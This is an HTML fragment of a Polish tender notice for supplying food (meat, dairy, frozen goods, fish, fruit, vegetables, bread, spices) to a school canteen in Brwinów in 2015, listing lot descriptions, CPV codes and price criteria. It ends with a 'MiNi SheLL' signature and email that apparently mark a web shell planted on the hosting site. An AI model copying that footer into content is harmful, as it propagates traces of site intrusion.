<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa produktów zwierzęcych, mięsa i podobnych produktów do stołówki szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11 zgodnie z formularzem  asortymentowo cenowym..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Produkty zwierzęce, mięso i produkty mięsne powinny być dostarczane w zamkniętych  opakowaniach lub pojemnikach plastikowych z pokrywami, posiadającymi stosowne atesty, czystych i  nieuszkodzonych. Mięso  musi  być  świeżę,  najwyższej  jakości, przewożone  zgodnie  z  wymogami  HACCP i warunkach  spełniających  wymogi  sanitarno - epidemiologiczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa mrożonek do stołówki szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11 zgodnie z formularzem asortymentowo cenowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przetworzone owoce, warzywa mrożone powinny być dostarczane w zamkniętych opakowaniach lub pojemnikach, posiadającymi  stosowne  atesty,  bez  oznak  rozmrożenia. Opakowania  nie  powinny  wykazywać oznak uszkodzeń mechanicznych. Transport powinien odbywać się zgodnie  z  wymogami  HACCP i  przepisami  sanitarno- epidemiologicznymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.21.00-5, 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa  nabiału  do stołówki  szkolnej  Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11   zgodnie  z  formularzem  asortymentowo cenowym..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nabiał i wszystkie jego produkty powinny być dostarczane w oryginalnych, nienaruszonych    opakowaniach zawierających oznaczenia fabryczne, tzn. rodzaj nazwę wyrobu, ilość, datę  przydatności  do  spożycia,  nazwę  i  adres  producenta. Przewożone zgodnie  z  wymogami  HACCP i  przepisami sanitarno- epidemiologicznymi. Dostarczane artykuły spożywcze musza przy każdej  dostawie posiadać wszystkie niezbędne dokumenty wymagane przepisami prawa w zakresie produktów żywnościowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.10.00-3, 15.54.21.00-0, 15.51.23.00-3, 15.55.13.20-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa owoców do stołówki szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11   zgodnie  z formularzem  asortymentowo  cenowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Owoce  powinny być świeże, bez  oznak zepsucia  i  pleśni. Powinny być  dostarczane w pojemnikach plastikowych bądź kartonowych posiadających stosowne  atesty. Opakowanie nie powinno wykazywać oznak  uszkodzeń  mechanicznych. Pojemniki  nie  mogą  posiadać oznak  zabrudzenia. Towar  musi być  ułożony w sposób zabezpieczający go przed uszkodzeniem lub  obniżeniem jakości pod względem wartości odżywczych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa pieczywa do stołówki szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11 zgodnie  z  formularzem asortymentowo  cenowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CPV: 15810000-9  pieczywo, świeże wyroby piekarskie i ciastkarskie
Pieczywo, świeże wyroby piekarskie powinny być dostarczane w koszach plastikowych  posiadających  stosowne  atest. Opakowanie  nie  powinno  wykazywać  oznak  uszkodzeń  mechanicznych i  oznak  zabrudzenia. Towar musi być ułożony w koszach w  sposób  zabezpieczający  go  przed  uszkodzeniem  lub obniżeniem jakości zarówno pod względem wartości odżywczych jak też wartości  organoleptycznych. Towar nie może wykazywać  oznak  nieświeżości  lub  zepsucia. Transport  powinien odbywać się  zgodnie  z  wymogami  HACCP i sanitarno - epidemiologicznymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa artykułów  spożywczych (przyprawy i słodycze) do stołówki  szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11  zgodnie  z  formularzem  asortymentowo  cenowym..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Artykuły spożywcze powinny być dostarczane w oryginalnych, nienaruszonych opakowaniach   zawierających oznaczenia fabryczne, tzn. rodzaj, nazwę wyrobu, ilość, datę przydatności  do  spożycia, nazwę i adres producenta oraz inne oznakowania zgodne z obowiązującymi w tym  zakresie przepisami prawa żywnościowego. Dostarczane  artykuły spożywcze w zależności  od  ich  kategorii muszą  przy  każdej dostawie  posiadać  wszystkie  niezbędne  dokumenty wymagane przepisami prawa w zakresie produktów żywnościowych. Transport powinien  odbywać się zgodnie wymogami HACCP i  sanitarno -epidemiologicznymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.12.70-7, 15.87.23.00-4, 15.84.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dostawa ryby mrożonej do stołówki szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11  zgodnie z formularzem asortymentowo cenowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryby mrożone powinny być dostarczane w zamkniętych opakowaniach lub pojemnikach, posiadającymi  stosowne  atesty,  bez  oznak  rozmrożenia. Opakowania  nie  powinny  wykazywać oznak  uszkodzeń  mechanicznych. Transport powinien odbywać  się  zgodnie  z  wymogami  HACCP i  przepisami  sanitarno- epidemiologicznymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Dostawa warzyw do stołówki szkolnej Zespołu Szkół Nr 1 w Brwinowie ul. Piłsudskiego 11 zgodnie z  formularzem  asortymentowo- cenowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warzywa powinny być świeże, bez  oznak  zepsucia i pleśni. Powinny być  dostarczane w pojemnikach plastikowych bądź kartonowych posiadających stosowne atesty. Opakowanie nie powinno wykazywać oznak  uszkodzeń  mechanicznych. Pojemniki  nie  mogą  posiadać oznak zabrudzenia. Towar musi być ułożony w sposób zabezpieczający go  przed uszkodzeniem lub  obniżeniem jakości pod względem wartości odżywczych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com